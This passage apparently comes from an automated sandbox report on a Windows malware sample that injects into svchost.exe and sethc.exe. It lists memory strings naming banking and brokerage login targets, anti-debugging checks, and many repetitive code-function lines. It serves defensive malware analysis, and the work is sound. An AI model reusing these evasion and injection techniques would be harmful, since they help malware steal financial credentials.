Source: 3MZ6696O.6.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 3MZ6696O.6.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 3MZ6696O.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 3MZ6696O.6.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 3MZ6696O.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 3MZ6696O.6.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 3MZ6696O.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 3MZ6696O.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 3MZ6696O.6.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: sethc.exe, 00000006.00000002.3780922348.0000000007EAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: smartscreen_scanned_downloads_counterINTEGERInteractive Brokers - HKVMware20,11696492231]
                Source: 3MZ6696O.6.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 3MZ6696O.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 3MZ6696O.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 3MZ6696O.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeAPI call chain: ExitProcess graph end nodegraph_0-92907
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\sethc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417E63 LdrLoadDll,2_2_00417E63
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00546AAF BlockInput,0_2_00546AAF
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_004F3D19
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00523920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00523920
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0050E01E LoadLibraryA,GetProcAddress,0_2_0050E01E
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_015F71B8 mov eax, dword ptr fs:[00000030h]0_2_015F71B8
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_015F8878 mov eax, dword ptr fs:[00000030h]0_2_015F8878
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_015F8818 mov eax, dword ptr fs:[00000030h]0_2_015F8818
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]2_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03308324 mov ecx, dword ptr fs:[00000030h]2_2_03308324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]2_2_0322C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]2_2_03250310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]2_2_032D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]2_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]2_2_032D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330634F mov eax, dword ptr fs:[00000030h]2_2_0330634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]2_2_032663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]2_2_032EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]2_2_032B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]2_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]2_2_0322823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]2_2_0322826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]2_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]2_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330625D mov eax, dword ptr fs:[00000030h]2_2_0330625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]2_2_0322A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]2_2_03236259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]2_2_032402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033062D6 mov eax, dword ptr fs:[00000030h]2_2_033062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]2_2_03260124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]2_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]2_2_032F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]2_2_03304164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]2_2_0322C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]2_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]2_2_03270185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]2_2_033061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]2_2_032601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]2_2_0322A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]2_2_0322C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]2_2_032C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]2_2_032B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]2_2_0325C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]2_2_03232050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]2_2_032B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032280A0 mov eax, dword ptr fs:[00000030h]2_2_032280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]2_2_032C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]2_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]2_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]2_2_0323208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0322A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]2_2_032380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]2_2_032B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]2_2_032307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]2_2_032E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]2_2_032D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]2_2_032BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]2_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]2_2_032B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]2_2_0324E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]2_2_03266620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]2_2_03268620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]2_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]2_2_032C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]2_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]2_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]2_2_03264588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]2_2_0326E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]2_2_032325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
